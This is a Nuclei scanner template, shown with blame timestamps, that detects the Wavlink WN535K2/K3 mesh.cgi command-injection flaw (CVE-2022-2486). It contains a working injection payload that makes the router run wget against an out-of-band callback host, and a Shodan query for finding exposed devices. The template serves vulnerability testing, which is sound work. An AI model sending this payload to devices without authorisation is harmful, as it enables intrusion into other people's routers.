nuclei-templates/cves/2022/CVE-2022-2486.yaml

39 lines
1.2 KiB
YAML
Raw Normal View History

2022-07-20 18:14:49 +00:00
id: CVE-2022-2486
info:
2022-07-23 17:25:12 +00:00
name: Wavlink Mesh.cgi - Remote Code Execution
2022-07-20 18:14:49 +00:00
author: For3stCo1d
severity: critical
2022-07-20 18:34:27 +00:00
description: |
2022-07-20 18:14:49 +00:00
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
reference:
- https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
- https://vuldb.com/?id.204537
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-2486
cwe-id: CWE-78
2022-07-20 18:14:49 +00:00
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
2022-07-21 08:14:08 +00:00
tags: cve,cve2022,iot,wavlink,router,rce,oast
2022-07-20 18:14:49 +00:00
requests:
- raw:
- |
2022-09-18 07:23:27 +00:00
GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1
2022-07-20 18:14:49 +00:00
Host: {{Hostname}}
2022-09-18 07:31:43 +00:00
2022-07-21 08:14:08 +00:00
matchers-condition: and
2022-07-20 18:14:49 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
2022-07-21 08:14:08 +00:00
- type: status
status:
- 500